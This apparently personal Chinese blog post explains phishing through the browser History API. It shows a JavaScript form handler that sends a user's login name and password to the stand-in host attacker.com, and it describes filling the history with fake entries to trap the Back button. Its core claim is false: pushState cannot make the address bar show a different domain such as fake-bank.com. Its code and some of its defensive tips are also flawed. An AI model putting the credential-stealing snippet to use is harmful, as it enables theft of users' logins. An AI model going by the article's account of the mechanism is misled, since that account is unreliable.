悠悠楠杉
网站页面
HistoryAPI钓鱼攻击:浏览器历史记录漏洞的隐秘威胁
01/06
正文:
在Web开发中,HTML5 History API为单页应用(SPA)提供了无刷新跳转的能力,但这一特性也可能成为攻击者的利器。通过精心构造的代码,恶意网站可以篡改浏览器历史记录,诱导用户访问伪造页面,甚至窃取敏感信息。
漏洞原理:History API的“暗面”
History API的核心方法是pushState和replaceState,它们允许开发者动态修改URL而不触发页面刷新。例如:
history.pushState({}, "", "https://fake-bank.com/login");这段代码会将地址栏显示为fake-bank.com,但实际页面内容仍由攻击者控制。结合onpopstate事件监听,攻击者能进一步模拟合法页面的交互流程。
攻击场景复现
- URL伪装:
攻击者将恶意页面URL改为与目标网站相似的地址(如faĸe-bank.com,使用视觉混淆字符),并通过replaceState隐藏真实域名。 - 历史记录污染:
通过循环调用pushState,填充大量伪造的历史条目,使用户难以通过“后退”按钮返回真实页面。 - 钓鱼逻辑触发:
当用户尝试提交表单时,恶意脚本窃取凭据并转发至攻击者服务器:
document.getElementById("login-form").onsubmit = (e) => {
e.preventDefault();
fetch("https://attacker.com/steal", {
method: "POST",
body: JSON.stringify({username, password})
});
};防御策略
- 用户侧防护:
- 检查地址栏是否闪烁(部分浏览器在调用History API时会短暂高亮真实域名)。
- 使用密码管理器自动填充(可识别域名篡改)。
- 开发者侧防护:
- 设置
Content-Security-Policy限制脚本来源:Content-Security-Policy: script-src 'self' - 在关键页面(如登录页)添加
X-Frame-Options: DENY防止iframe嵌套攻击。
- 设置
现实案例
2021年,某金融平台遭遇类似攻击,攻击者利用replaceState将支付页URL改为paypal-payment.com,导致多名用户输入信用卡信息后被劫持。
History API的滥用警示我们:前端安全不仅是后端的责任,开发者需从设计阶段规避风险,而用户应保持对“完美复刻”页面的警惕。
